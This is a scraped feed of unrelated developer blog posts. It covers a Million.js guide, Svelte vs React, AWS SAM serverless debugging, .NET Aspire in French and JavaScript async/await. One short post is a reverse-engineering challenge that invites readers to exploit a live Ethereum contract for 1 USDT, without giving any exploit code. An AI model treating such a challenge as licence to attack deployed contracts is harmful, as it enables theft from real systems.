an Element** ```html <div id="toggleDiv">This is a toggleable div.</div> <button id="toggleButton">Toggle Visibility</button> <script> document.getElementById('toggleButton').addEventListener('click', function() { const div = document.getElementById('toggleDiv'); if (div.style.display === 'none') { div.style.display = 'block'; } else { div.style.display = 'none'; } }); </script> ``` - `<div id="toggleDiv">This is a toggleable div.</div>`: A div element with some text that we want to show or hide. - `<button id="toggleButton">Toggle Visibility</button>`: A button to toggle the visibility of the div. - `document.getElementById('toggleButton').addEventListener('click', function() { ... })`: Adds a click event listener to the button. - `const div = document.getElementById('toggleDiv');`: Selects the div element. - `if (div.style.display === 'none') { div.style.display = 'block'; } else { div.style.display = 'none'; }`: Toggles the display property of the div between 'none' (hidden) and 'block' (visible).
mukeshb
1,908,039
Million.js adoption guide: Overview, examples, and alternatives
Written by Isaac Okoro✏️ The frontend ecosystem has seen lots of recent improvements for making...
0
2024-07-02T16:37:42
https://blog.logrocket.com/million-js-adoption-guide
millionjs, webdev
**Written by [Isaac Okoro](https://blog.logrocket.com/author/isaacjunior/)✏️** The frontend ecosystem has seen lots of recent improvements for making development easier and increasing productivity. Some of these improvements have come through the introduction of faster tools and frameworks like Svelte, Bun, Preact, Blitz, and more. In this guide, we will take a look at one such framework called Million.js. We’ll look at why it was created, how it works, and the pros and cons that may arise from using this new framework. By the end of this article, you’ll understand how and when to adopt Million.js strategically in your projects. * * * ## What is Million.js? Million.js is an open source, minimalistic JavaScript compiler designed to revolutionize and improve React performance overhead. It lets you write JSX code like React, but compile your code so you ship a lot less JavaScript to the browser. Created by Aiden Bai, Million uses a granular approach when updating the DOM. This works differently from how React handles DOM updates, where it updates the entire DOM tree. Million’s approach reduces memory usage, improves rendering speed and performance without sacrificing flexibility. Million.js achieves these feats by utilizing a special feature known as blocks. A block is a lightweight and highly performant higher-order component (HOC) optimized for rendering speed that you can use as a React component. #### _Further reading:_ * [Understanding the virtual DOM in React](https://blog.logrocket.com/virtual-dom-react/) * [Understanding React higher order components](https://blog.logrocket.com/understanding-react-higher-order-components/) * * * ## Why use Million.js? Million.js offers a revolutionary approach when dealing with millions of data points compared to frameworks that employ traditional virtual DOM approaches. Let's see some reasons why you should consider using Million.js: * **Blazing fast speed**: Million.js utilizes specialized data structures and a unique diffing strategy, making it extremely fast at handling applications. Million analyzes and automatically compiles your React code into optimized HOCs before rendering them, making the code 70 percent faster compared to React code written without Million.js * **Low memory usage**: Million reduces memory usage and increase performance by using less than half the memory that React does for every single operation. By using observers on DOM nodes to tract state changes more effectively, Million does away with the need for a virtual DOM, thereby reducing memory usage and performance overhead * **DX**: Since Million.js aims to be a simple and lightweight compiler for React applications, DX was a major factor in its creation. This shows how easy it is to set up and use Million.js, both for new developers and those with plenty of React experience * **Integrations**: You can integrate Million.js seamlessly with not only React, but also with React frameworks like Astro, Gatsby, Next.js. * **Documentation**: The comprehensive and user-friendly Million.js documentation provides clear guidance on using the framework effectively. The docs also cover installation instructions, API references, and usage examples, and making it easy for developers to get started and integrate Million.js into their projects #### _Further reading:_ * [Million: Build apps with JSX faster than React and Preact](https://blog.logrocket.com/million-js-build-apps-jsx-faster-react-preact/) * * * ## Drawbacks of using Million.js While Million.js offers advantages like low memory usage and performance optimization, it's essential to consider potential drawbacks before deciding to use it in a project: * **Community & ecosystem**: As a newer tool, Million.js has a relatively limited ecosystem compared to more established frameworks. You may face challenges finding community support, third-party plugins, or comprehensive documentation * **Learning curve**: The learning curve for Million.js might be steeper for developers accustomed to more mainstream frameworks due to its unique approach and how some of its features work * **Future updates & support**: As with any newer technology, you might also be concerned about long-term maintenance and support, as the framework's future development and updates are uncertain Despite these drawbacks, Million.js can still be a viable choice for projects that prioritize lightweight and efficient solutions. * * * ## Getting started with Million.js We have discussed the reasons why you should use Million.js in your next React application, along with some potential drawbacks. Let's now take a look at how you can get started with Million.js. First, create your React application by running the command below: ```bash yarn create vite ``` Follow the prompts to create your React application and then run `yarn` to install all dependencies. Next, install Million into your project with the command below: ```bash yarn add million ``` With that done, copy the code below into the `vite.config.js` file of your application: ```javascript import million from "million/compiler"; import react from "@vitejs/plugin-react"; import { defineConfig } from "vite"; export default defineConfig({ plugins: [million.vite({ auto: true }), react()], }); ``` Now, you are ready to use Million.js features in your project. * * * ## Understanding blocks, a key Million.js feature Million.js introduces a unique concept called a block component. These blocks are the fundamental building blocks for creating user interfaces within your Million.js applications. Million.js blocks go beyond simple components. They’re wrapped in a special HOC that optimizes their rendering performance. The HOC analyzes the block's structure and data flow to identify opportunities for efficient updates, leading to smoother and faster UIs. At their core, blocks are essentially functions that accept an object containing properties (props) that define the block's behavior and appearance. This is similar to how traditional React components work. Here’s an example of how to use blocks in your application: ```javascript import { block } from "million/react"; const MyFirstMillionCompomemt = block(function Component() { return <h1>I just created my first Million component!</h1>; }); function App() { return ( <div> <MyFirstMillionCompomemt /> </div> ); } export default App; ``` In the code block above, we imported a block from Million, used it to wrap the component, and then rendered the wrapped component inside the `App` component. The result in the browser should look like the image below: ![Example Million Js Text Component On A Black Background](https://blog.logrocket.com/wp-content/uploads/2024/06/Example-Million-js-component-e1719336408702.png) There are certain rules you should follow to use the block component effectively. When declaring a block, you should define it as a variable declaration. For example: ```javascript const Block = block(() =><h1>Hey Hey</h1>) // ✅ Correct export default Block; ``` Declaring it any other way is wrong and throws an error. Below are examples of invalid declarations of blocks: ```javascript console.log(block(() => <h1>Hey Hey</h1>)) // ❌ Wrong export default block(() => <h1>Hey Hey</h1>) // ❌ Wrong ``` When importing a block, the block component must be imported from `"million/react"` and not from `'million'` as shown in the code block below: ```javascript import { block } from 'million/react'; // ✅ Correct ``` The `<For />` method is recommended when displaying a list within a block in Million.js. This happens because the `Array.map()` method used in React degrades performance and is not ideal, especially if the component that holds the list is a block: ```javascript <For each={items}> {(item) => <div key={item}>{item}</div>} </For> ``` * * * ## Deploying your Million.js project Million.js offers various options for deploying your application. Some popular options include: * **Static hosting**: This straightforward approach is ideal for simple Million.js projects. Platforms like Netlify, Vercel, or GitHub Pages allow you to deploy your built static files without any hassle, making them accessible to users * **Custom server setup**: For more complex applications requiring specific server-side functionalities, you can deploy your Million.js project on a custom server setup. This offers greater control, but demands more technical expertise to manage the server environment These options give you the flexibility to choose which deployment method is best for your project's needs. * * * ## Use cases for Million.js Million.js, with its focus on performance and efficiency, shines in specific business scenarios where performance and efficiency are critical. Here are some notable use cases: * **Single-page applications (SPAs)**: Million.js is well-suited to building SPAs due to its small size and efficient rendering. SPAs require seamless navigation and fast loading times, which Million.js can provide, enhancing the user experience * **Progressive web applications (PWAs)**: Million.js helps create lightweight, responsive PWAs that have offline functionality and flow memory usage, delivering optimal performance even on low-end devices * **Applications with nested data**: Million.js is well suited for applications that utilize nested data. Nested data is typically slow to render due to tree traversal (i.e., going through the entire tree of data to find the data points your application needs) but Million’s optimized blocks make this faster and more elegant. Some examples of these applications include ecommerce applications and Content Management Systems (CMS) * * * ## Million.js vs. similar Here's a breakdown of how Million.js compares to React, Preact, and Vue.js across key aspects: <table> <thead> <tr> <th>Feature</th> <th>Million.js</th> <th>React</th> <th>Preact</th> <th>Vue.js</th> </tr> </thead> <tbody> <tr> <td>Features</td> <td>Limited. Offers a core set of features with a focus on performance and simplicity. The framework is still evolving, so the feature set is expanding</td> <td>Extensive. Boasts a vast library of features and third-party components, making it suitable for complex applications</td> <td>Similar to React. Focuses on a smaller footprint, but with faster performance. It prioritizes compatibility with existing React code</td> <td>Good balance between features and ease of use. Offers a comprehensive built-in feature set and a strong third-party ecosystem</td> </tr> <tr> <td>Performance</td> <td>Potentially fastest. Shines in performance due to its focus on an efficient rendering approach</td> <td>Good performance. Complex applications with large codebases may experience performance bottlenecks</td> <td>Good. Similar to React, but with a potential edge due to its smaller size</td> <td>Generally good. Might not be the fastest option compared to Million.js or Preact</td> </tr> <tr> <td>Community</td> <td>Smaller, growing</td> <td>Very large and active</td> <td>Leverages React's community</td> <td>Large and active</td> </tr> <tr> <td>Documentation</td> <td>Limited, evolving</td> <td>Extensive documentation and a wealth of tutorials and learning resources</td> <td>Leverages React's resources, but its resources are more limited</td> <td>Comprehensive</td> </tr> <tr> <td>Learning curve</td> <td>Easier. Might be slightly challenging for developers from other frameworks to pick up, but those already familiar with React will have an easier time learning Million.js</td> <td>Moderate due to its JSX syntax and component-based structure</td> <td>Moderate. Similar learning curve to React as it shares the same core concepts</td> <td>Generally considered moderate, with a balance between simplicity and features</td> </tr> </tbody> </table> This comparison table should give you a good sense of each option’s strengths and whether they’re suited to your use case. * * * ## Conclusion This article took an in-depth look at Million.js, an open source, minimalistic JavaScript compiler designed to revolutionize and improve React performance. We looked at the key features of Million.js, advantages and potential drawbacks with using Million.js. I hope this adoption guide helps you judge whether Million.js is suited to your needs. Have fun using Million.js in your next React application! --- ##Get set up with LogRocket's modern error tracking in minutes: 1. Visit https://logrocket.com/signup/ to get an app ID. 2. Install LogRocket via NPM or script tag. `LogRocket.init()` must be called client-side, not server-side. NPM: ```bash $ npm i --save logrocket // Code: import LogRocket from 'logrocket'; LogRocket.init('app/id'); ``` Script Tag: ```javascript Add to your HTML: <script src="https://cdn.lr-ingest.com/LogRocket.min.js"></script> <script>window.LogRocket && window.LogRocket.init('app/id');</script> ``` 3.(Optional) Install plugins for deeper integrations with your stack: * Redux middleware * ngrx middleware * Vuex plugin [Get started now](https://lp.logrocket.com/blg/signup)
leemeganj
1,909,128
Svelte and React
Beyond Buttons: A Frontend Showdown - Svelte vs. React Hey there, code enthusiasts! Today, we're...
0
2024-07-02T16:35:32
https://dev.to/expectationshack/svelte-and-react-4j5c
**Beyond Buttons: A Frontend Showdown - Svelte vs. React** Hey there, code enthusiasts! Today, we're diving into the dynamic world of frontend development and comparing two hot technologies: Svelte and React. Both are rockstars in building user interfaces, but they take different approaches. Let's see which one shines brighter for your next project. **Svelte: The Compiler with Superpowers** Svelte is a rising star, taking a unique approach. Unlike React's virtual DOM, Svelte compiles your code into highly optimized vanilla JavaScript during the build phase. This eliminates the need for a virtual DOM, resulting in smaller bundle sizes and potentially faster performance. **Why Svelte Intrigues Me** Honestly, the idea of super-clean, compiled code is exciting! Svelte seems ideal for building performant web applications, and its reactive system feels intuitive. As I delve deeper into frontend development at HNG https://hng.tech/internship, I'm definitely eager to explore Svelte alongside React to see which one feels more natural for different project needs. **React: The OG Component King** React, developed by Facebook, is a heavyweight champion. It's a JavaScript library that uses a component-based architecture. Imagine building complex UIs by snapping together pre-built, reusable components – that's React's core strength. It offers a mature ecosystem, tons of libraries, and a massive community for support. **What I Love About React** As a proud HNG Intern yearning to refine my frontend skills https://hng.tech/premuim, React is like the perfect jungle gym. The HNG curriculum utilizes React heavily, and it's fantastic for building interactive experiences. The component structure makes code organization a breeze, and the learning curve, while present, feels manageable thanks to the extensive resources available. Now, React isn't without its quirks. The virtual DOM (Document Object Model) manipulation can feel opaque for beginners, and setting up a React project can involve a bit of boilerplate code. **The Verdict: It Depends!** Both React and Svelte are fantastic tools, each with its strengths. React offers a mature ecosystem and a gentle learning curve, while Svelte boasts blazing-fast performance and a clean development experience. The best choice depends on your project requirements. Building a complex, interactive app? React might be your champion. Need a blazing-fast, single-page application? Svelte could be your secret weapon. So, frontend warriors, don't be afraid to experiment! Explore both React and Svelte (there are great jobs opportunity on the HNG platform https://hng.tech/hire, by the way!), and discover which one empowers you to build the most awesome web experiences!
expectationshack
1,909,127
EVM Reverse Engineering Challenge 0x02
The third challenge it's here. I'll keep it simple like the other ones, but in order to help you out...
27,871
2024-07-02T16:34:19
https://gealber.com/evm-reverse-challenge-0x02
evm, ethereum, challenge, reverseengineer
The third challenge it's here. I'll keep it simple like the other ones, but in order to help you out a bit I will always give you super useful hint like in this case. Also I'll suggest you to make the challenges in order because you will possible need to use previous challenges exploits. Here is the address of the contract, remember always to simulate before actually making the transaction. For that you can use [Tenderly](https://tenderly.co/), or [Temper](https://github.com/EnsoFinance/temper). No more description, exploit this contract and get 1 USDT!! ``` 0xd436932352dECf38720b04Ef172F7FafdEe7Ab6F ``` Hint: I was born in a cross-fire hurricane...
gealber
1,909,125
How do I close my DEV account
I no longer want an account with this system. I want to remove my information. How do I close this...
0
2024-07-02T16:31:25
https://dev.to/michael_riat_4fd70bc4717e/how-do-i-close-my-dev-account-3lk
dev
I no longer want an account with this system. I want to remove my information. How do I close this account?
michael_riat_4fd70bc4717e
1,908,384
Mastering Serverless Debugging
Introduction to Serverless Computing Challenges of Serverless Debugging Disconnected...
20,817
2024-07-02T16:26:02
https://debugagent.com/mastering-serverless-debugging
lambda, tutorial, serverless, developers
- [Introduction to Serverless Computing](#introduction-to-serverless-computing) - [Challenges of Serverless Debugging](#challenges-of-serverless-debugging) * [Disconnected Environments](#disconnected-environments) * [Lack of Standardization](#lack-of-standardization) * [Limited Debugging Tools](#limited-debugging-tools) * [Concurrency and Scale](#concurrency-and-scale) - [Effective Strategies for Serverless Debugging](#effective-strategies-for-serverless-debugging) * [Local Debugging with IDE Remote Capabilities](#local-debugging-with-ide-remote-capabilities) * [Using Feature Flags for Debugging](#using-feature-flags-for-debugging) * [Staged Rollouts and Canary Deployments](#staged-rollouts-and-canary-deployments) * [Comprehensive Logging](#comprehensive-logging) * [Embracing Idempotency](#embracing-idempotency) - [Debugging a Lambda Application Locally with AWS SAM](#debugging-a-lambda-application-locally-with-aws-sam) * [Setting Up the Local Environment](#setting-up-the-local-environment) * [Running the Hello World Application Locally](#running-the-hello-world-application-locally) * [Configuring Remote Debugging](#configuring-remote-debugging) * [Handling Debugger Timeouts](#handling-debugger-timeouts) - [Final Word](#final-word) Serverless computing has emerged as a transformative approach to deploying and managing applications. The theory is that by abstracting away the underlying infrastructure, developers can focus solely on writing code. While the benefits are clear—scalability, cost efficiency, and performance—debugging serverless applications presents unique challenges. This post explores effective strategies for debugging serverless applications, particularly focusing on AWS Lambda. Before I proceed I think it's important to disclose a bias: I am personally not a huge fan of Serverless or PaaS after [I was burned badly by PaaS in the past](https://dev.to/codenameone/production-horrors-handling-disasters-public-debrief-1kf6). However, [some smart people like Adam swear by it](https://www.adam-bien.com/) so I should keep an open mind. {% embed https://youtu.be/B6uyutAbEDw %} As a side note, if you like the content of this and the other posts in this series check out my [Debugging book](https://www.amazon.com/dp/1484290410/) that covers **t**his subject. If you have friends that are learning to code I'd appreciate a reference to my [Java Basics book.](https://www.amazon.com/Java-Basics-Practical-Introduction-Full-Stack-ebook/dp/B0CCPGZ8W1/) If you want to get back to Java after a while check out my [Java 8 to 21 book](https://www.amazon.com/Java-21-Explore-cutting-edge-features/dp/9355513925/)**.** ## Introduction to Serverless Computing Serverless computing, often referred to as Function as a Service (FaaS), allows developers to build and run applications without managing servers. In this model, cloud providers automatically handle the infrastructure, scaling, and management tasks, enabling developers to focus purely on writing and deploying code. Popular serverless platforms include AWS Lambda, Azure Functions, and Google Cloud Functions. In contrast, Platform as a Service (PaaS) offers a more managed environment where developers can deploy applications but still need to configure and manage some aspects of the infrastructure. PaaS solutions, such as Heroku and Google App Engine, provide a higher level of abstraction than Infrastructure as a Service (IaaS) but still require some server management. Kubernetes, [which we recently discussed](https://debugagent.com/why-is-kubernetes-debugging-so-problematic?source=more_series_bottom_blogs), is an open-source container orchestration platform that automates the deployment, scaling, and management of containerized applications. While Kubernetes offers powerful capabilities for managing complex, multi-container applications, it requires significant expertise to set up and maintain. Serverless computing simplifies this by removing the need for container orchestration and management altogether. The "catch" is two fold: * Serverless programming removes the need to understand the servers but also removes the ability to rely on them resulting in more complex architectures. * Pricing starts off cheap. Practically free. It can quickly escalate especially in case of an attack or misconfiguration. ## Challenges of Serverless Debugging While serverless architectures offer some benefits, they also introduce unique debugging challenges. The primary issues stem from the inherent complexity and distributed nature of serverless environments. Here are some of the most pressing challenges. ### Disconnected Environments One of the major hurdles in serverless debugging is the lack of consistency between development, staging, and production environments. While traditional development practices rely on these separate environments to test and validate code changes, serverless architectures often complicate this process. The differences in configuration and scale between these environments can lead to bugs that only appear in production, making them difficult to reproduce and fix. ### Lack of Standardization The serverless ecosystem is highly fragmented, with various vendors offering different tools and frameworks. This lack of standardization can make it challenging to adopt a unified debugging approach. Each platform has its own set of practices and tools, requiring developers to learn and adapt to multiple environments. This is slowly evolving with some platforms gaining traction, but since this is a vendor driven industry there are many edge cases. ### Limited Debugging Tools Traditional debugging tools, such as step-through debugging and breakpoints, are often unavailable in serverless environments. The managed and controlled nature of serverless functions restricts access to these tools, forcing developers to rely on alternative methods, such as logging and remote debugging. ### Concurrency and Scale Serverless functions are designed to handle high concurrency and scale seamlessly. However, this can introduce issues that are hard to reproduce in a local development environment. Bugs that manifest only under specific concurrency conditions or high load are particularly challenging to debug. Notice that when I discuss concurrency here I'm often referring to race conditions between separate services. ## Effective Strategies for Serverless Debugging Despite these challenges, several strategies can help make serverless debugging more manageable. By leveraging a combination of local debugging, feature flags, staged rollouts, logging, idempotency, and Infrastructure as Code (IaC), developers can effectively diagnose and fix issues in serverless applications. ### Local Debugging with IDE Remote Capabilities While serverless functions run in the cloud, you can simulate their execution locally using tools like AWS SAM (Serverless Application Model). This involves setting up a local server that mimics the cloud environment, allowing you to run tests and perform basic trial-and-error debugging. To get started, you need to install Docker or Docker Desktop, create an AWS account, and set up the AWS SAM CLI. Deploy your serverless application locally using the SAM CLI, which enables you to run the application and simulate Lambda functions on your local machine. Configure your IDE for remote debugging, launching the application in debug mode, and connecting your debugger to the local host. Set breakpoints to step through the code and identify issues. ### Using Feature Flags for Debugging Feature flags allow you to enable or disable parts of your application without deploying new code. This can be invaluable for isolating issues in a live environment. By toggling specific features on or off, you can narrow down the problematic areas and observe the application’s behavior under different configurations. Implementing feature flags involves adding conditional checks in your code that control the execution of specific features based on the flag’s status. Monitoring the application with different flag settings helps identify the source of bugs and allows you to test fixes without affecting the entire user base. This is essentially "debugging in production". Working on a new feature? Wrap it in a feature flag which is effectively akin to wrapping the entire feature (client and server) in if statements. You can then enable it conditionally globally or on a per user basis. This means you can test the feature, enable or disable it based on configuration without redeploying the application. ### Staged Rollouts and Canary Deployments Deploying changes incrementally can help catch bugs before they affect all users. Staged rollouts involve gradually rolling out updates to a small percentage of users before a full deployment. This allows you to monitor the performance and error logs of the new version in a controlled manner, catching issues early. Canary deployments take this a step further by deploying new changes to a small subset of instances (canaries) while the rest of the system runs the stable version. If issues are detected in the canaries, you can roll back the changes without impacting the majority of users. This method limits the impact of potential bugs and provides a safer way to introduce updates. This isn't great as in some cases some demographics might be more reluctant to report errors. However, for server side issues this might make sense as you can see the impact based on server logs and metrics. ### Comprehensive Logging Logging is one of the most common and essential tools for debugging serverless applications. I wrote and [spoke a lot about logging in the past](https://www.youtube.com/watch?v=53qCLRFcBSs). By logging all relevant data points, including inputs and outputs of your functions, you can trace the flow of execution and identify where things go wrong. However, excessive logging can increase costs, as serverless billing is often based on execution time and resources used. It’s important to strike a balance between sufficient logging and cost efficiency. Implementing log levels and selectively enabling detailed logs only when necessary can help manage costs while providing the information needed for debugging. I talk about striking the delicate balance between debuggable code, performance and cost with logs in the following video. Notice that this is a general best practice and not specific to serverless. {% embed https://www.youtube.com/watch?v=53qCLRFcBSs %} ### Embracing Idempotency Idempotency, a key concept from functional programming, ensures that functions produce the same result given the same inputs, regardless of the number of times they are executed. This simplifies debugging and testing by ensuring consistent and predictable behavior. Designing your serverless functions to be idempotent involves ensuring that they do not have side effects that could alter the outcome when executed multiple times. For example, including timestamps or unique identifiers in your requests can help maintain consistency. Regularly testing your functions to verify idempotency can make it easier to pinpoint discrepancies and debug issues. Testing is always important but in serverless and complex deployments it becomes critical. Awareness and embrace of idempotency allows for more testable code and easier to reproduce bugs. ## Debugging a Lambda Application Locally with AWS SAM {% embed https://youtu.be/SlFA-JlTYGM %} Debugging serverless applications, particularly AWS Lambda functions, can be challenging due to their distributed nature and the limitations of traditional debugging tools. However, AWS SAM (Serverless Application Model) provides a way to simulate Lambda functions locally, enabling developers to test and debug their applications more effectively. I will use it as a sample to explore the process of setting up a local debugging environment, running a sample application, and configuring remote debugging. ### Setting Up the Local Environment Before diving into the debugging process, it's crucial to set up a local environment that can simulate the AWS Lambda environment. This involves a few key steps: 1. **Install Docker**: Docker is required to run the local simulation of the Lambda environment. You can download Docker or Docker Desktop from the official [Docker website](https://docs.docker.com/get-docker/). 2. **Create an AWS Account**: If you don't already have an AWS account, you need to create one. Follow the instructions on the [AWS account creation page](https://aws.amazon.com/premiumsupport/knowledge-center/create-and-activate-aws-account/). 3. **Set Up AWS SAM CLI**: The AWS SAM CLI is essential for building and running serverless applications locally. You can install it by following the [AWS SAM installation guide](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html). ### Running the Hello World Application Locally To illustrate the debugging process, let's use a simple "Hello World" application. The code for this application can be found in the [AWS Hello World tutorial](https://github.com/shai-almog/HelloLambda). 1. **Deploy Locally**: Use the SAM CLI to deploy the Hello World application locally. This can be done with the following command: ```bash sam local start-api ``` This command starts a local server that simulates the AWS Lambda cloud environment. 2. **Trigger the Endpoint**: Once the local server is running, you can trigger the endpoint using a `curl` command: ```bash curl http://localhost:3000/hello ``` This command sends a request to the local server, allowing you to test the function's response. ### Configuring Remote Debugging While running tests locally is a valuable step, it doesn't provide full debugging capabilities. To debug the application, you need to configure remote debugging. This involves several steps. First we need to start the application in debug mode using the following SAM command: ```bash sam local invoke -d 5858 ``` This command pauses the application and waits for a debugger to connect. Next we need to configure the IDE for remote debugging. We start by setting up the IDE to connect to the local host for remote debugging. This typically involves creating a new run configuration that matches the remote debugging settings. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0mlv7ij1mypsmg0rzlsk.png) We can now set breakpoints in the code where we want the execution to pause. This allows us to step through the code and inspect variables and application state just like in any other local application. We can test this by invoking the endpoint e.g. using curl. With the debugger connected we would stop on the breakpoint like any other tool: ```bash curl http://localhost:3000/hello ``` The application will pause at the breakpoints you set, allowing you to step through the code. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yzpgf6da5rpw332ednvm.png) ### Handling Debugger Timeouts One significant challenge when debugging Lambda functions is the quick timeout setting. Lambda functions are designed to execute quickly, and if they take too long, the costs can become prohibitive. By default, the timeout is set to a short duration, but you can configure this in the `template.yaml` file e.g.: ```yaml Resources: HelloWorldFunction: Type: AWS::Serverless::Function Properties: Handler: app.lambdaHandler Timeout: 60 # timeout in seconds ``` After updating the timeout value, re-issue the `sam build` command to apply the changes. In some cases, running the application locally might not be enough. You may need to simulate running on the actual AWS stack to get more accurate debugging information. Solutions like SST (Serverless Stack) or MerLoc can help achieve this, though they are specific to AWS and relatively niche. ## Final Word Serverless debugging requires a combination of strategies to effectively identify and resolve issues. While traditional debugging methods may not always apply, leveraging local debugging, feature flags, staged rollouts, comprehensive logging, idempotency, and IaC can significantly improve your ability to debug serverless applications. As the serverless ecosystem continues to evolve, staying adaptable and continuously updating your debugging techniques will be key to success. Debugging serverless applications, particularly AWS Lambda functions, can be complex due to their distributed nature and the constraints of traditional debugging tools. However, by leveraging tools like AWS SAM, you can simulate the Lambda environment locally and use remote debugging to step through your code. Adjusting timeout settings and considering advanced simulation tools can further enhance your debugging capabilities.
codenameone
1,909,102
Apprendre .NET Aspire en français
En mai dernier, durant Microsoft Build, .NET Aspire a été officiellement annoncé. Cette nouvelle pile...
0
2024-07-02T16:24:47
https://dev.to/azure/apprendre-net-aspire-en-francais-94a
dotnet, french, webdev, cloudnative
En mai dernier, durant Microsoft Build, .NET Aspire a été officiellement annoncé. Cette nouvelle pile prête pour le cloud et conçue pour .NET, visant à permettre aux développeurs de créer rapidement et facilement des applications natives cloud. ![.NET Aspire en 6 points](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/95attcw0u23p4mbp77mn.png) Que ce soit pour une toute petite application ou une solution complexe comprenant plusieurs microservices, .NET Aspire est conçu pour vous aider à démarrer rapidement et à évoluer en toute confiance. Dans la vidéo francophone suivante, je vous démontre pas-à-pas comment ajouter .NET Aspire à une application existante, dans le confort de Visual Studio 2022. {% youtube jJiqqVPDN4w %} ## Chapitres - [Mise en contexte](https://www.youtube.com/live/jJiqqVPDN4w?si=yvGQZUahsJRUVy46&t=484) - [Quand utiliser .NET Aspire](https://www.youtube.com/live/jJiqqVPDN4w?si=q1BxJOaOrW3WByS3&t=934) - [Application avant l'ajout de .NET Aspire](https://www.youtube.com/live/jJiqqVPDN4w?si=q0fj5UJ5MEmWOR_b&t=1484) - [Demo 1 - Ajout des Paramètres par défaut intelligents](https://www.youtube.com/live/jJiqqVPDN4w?si=W4oWt2Qez-vxo2Iv&t=2222) - [Tableau de bord du développeur](https://www.youtube.com/live/jJiqqVPDN4w?si=v7yQcb7ZK2RF1pm2&t=3411) - [Demo 3 - Orchestration](https://www.youtube.com/live/jJiqqVPDN4w?si=miBtoWcYsymg-e-R&t=3729) - [Demo 4 - Découverte de services](https://www.youtube.com/live/jJiqqVPDN4w?si=sGXlFw2lYurF1itF&t=4852) - [Demo 5 - Ajout de composante](https://www.youtube.com/live/jJiqqVPDN4w?si=0VqiM0t25mlnrzDA&t=5564) - [Déploiement](https://www.youtube.com/live/jJiqqVPDN4w?si=0QIGm7OPB37MC48K&t=6279) - [Autres langages et ressources](https://www.youtube.com/live/jJiqqVPDN4w?si=F3W-b1wmDm4QhlVg&t=6545) ## En Conclusion .NET Aspire peut semblé complexe au premier abord, mais c'est tout le contraire! Il est conçu pour vous aider à démarrer rapidement, quelle que soit la taille de votre application. Utilisez .NET Aspire pour que votre projet procurera une meilleure expérience pour les développeurs et simplifiera le déploiement de votre application. Si plus de contenu en français vous intéresse, n'hésitez pas à le faire savoir en laissant un commentaire ci-dessous ou en me contactant sur les médias sociaux. ## Liens utiles - Apprenons .NET – Aspire: https://aka.ms/letslearn/dotnet/aspire - Documentation: https://aka.ms/dotnet-aspire - Contenue de l'atelier/ workshop: https://github.com/dotnet-presentations/letslearn-dotnet-aspire
fboucheros
1,909,098
Mastering Async Await in JavaScript for Asynchronous Programming
Introduction Asynchronous programming is a must-have in modern JavaScript development,...
0
2024-07-02T16:19:04
https://antondevtips.com/blog/mastering-async-await-in-javascript-for-asynchronous-programming
webdev, javascript, async, frontend
--- canonical_url: https://antondevtips.com/blog/mastering-async-await-in-javascript-for-asynchronous-programming --- ## Introduction Asynchronous programming is a must-have in modern JavaScript development, allowing developers to perform non-blocking operations, such as fetching data from a server, reading files, or executing time-consuming operations. **ES2017** introduced async functions and the `await` keyword that are a complete game changer in asynchronous development. This blog post is a guide to using **async/await** to handle asynchronous tasks in an elegant way. > **_On my website: [antondevtips.com](https://antondevtips.com/blog/mastering-async-await-in-javascript-for-asynchronous-programming?utm_source=devto&utm_medium=social&utm_campaign=02_07_24) I already have JavaScript blog posts._** > **_[Subscribe](https://antondevtips.com/#subscribe) as more are coming._** ## How To Use Async/Await `async/await` statements allow developers to write asynchronous code that looks and behaves like a synchronous code: ```js async function fetchDataAsync() { const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); return data; } const data = await fetchDataAsync(); console.log(data); ``` Here an `async` function returns a `Promise<T>`, that holds a data received from the API call. By using `await` keyword we get this data as a promise result. After the line `const data = await fetchDataAsync();` we can simply write more code as if all operations were executed synchronously. `async/await` offer an elegant way for executing asynchronous operations represented by JavaScript Promises. To learn more about promises [read my blog post](https://antondevtips.com/blog/understanding-javascript-promises-a-guide-to-asynchronous-programming). `await` keyword is only allowed to be used in the `async` functions. ```js function test() { const data = await fetchDataAsync(); // Syntax error } async function test() { const data = await fetchDataAsync(); // Now ok } ``` ## Async/Await in Top-Level Statements With the introduction of ECMAScript 2022, JavaScript supports top-level `await` statements in modules. This allows you to use `await` outside of async functions within modules, simplifying the initialization of resources. ```js const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); console.log(data); ``` Outside modules or in older versions of web browsers, you can use the following trick with anonymous async function to use `await` in top-level statements: ```js (async () => { const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); console.log(data); })(); ``` ## Async Methods as Class Members You can encapsulate asynchronous logic within objects by defining async methods in JS classes. It is a good practise to add `Async` suffix when naming asynchronous functions. ```js class PostService { async getPostsAsync() { const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); return data; } } const postService = new PostService(); const data = await postService.getPostsAsync(); console.log(data); ``` ## Error Handing When Using Async/Await Error handling when using `async/await` is straightforward by using `try/catch` statement: ```js async function fetchDataAsync() { try { const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); return data; } catch (error) { console.error("Failed to fetch data: ", error); } } ``` When a `reject` method is called while awaiting a promise - an exception is thrown, that can be handled in the `catch` block: ```js function testPromise() { return new Promise((resolve, reject) => { setTimeout(() => { reject(new Error("Test Error")); }, 1000); }); } try { const response = await testPromise(); } catch (error) { console.error("Failed to get result: ", error); } ``` ## Using Promise Utility Methods With Async/Await Promise class has few utility static methods for asynchronous programming: - Promise.all - Promise.any - Promise.race - Promise.allSettled ### Promise.all You can use `Promise.all` function to wait for multiple promises to resolve. This function takes an array of promises and returns a new promise that resolves when all of the promises have resolved, or rejects if any promise is rejected. This method is particularly useful when you have multiple asynchronous operations that can be executed in parallel. Let's explore an example, where we fetch posts, comments and todos using `Promise.all`: ```js async function fetchMultipleResourcesAsync() { const urls = [ "https://jsonplaceholder.typicode.com/posts", "https://jsonplaceholder.typicode.com/comments", "https://jsonplaceholder.typicode.com/todos" ]; try { const promises = urls.map(url => fetch(url)); const responses = await Promise.all(promises); const data = await Promise.all(responses.map(res => res.json())); return data; } catch (error) { console.error("Error fetching one or more resources:", error); } return null; } const data = await fetchMultipleResourcesAsync(); console.log("Posts, comments, todos:", data); ``` It will be more efficient to fetch this data in parallel than fetching posts, comments and todos one by one. ### 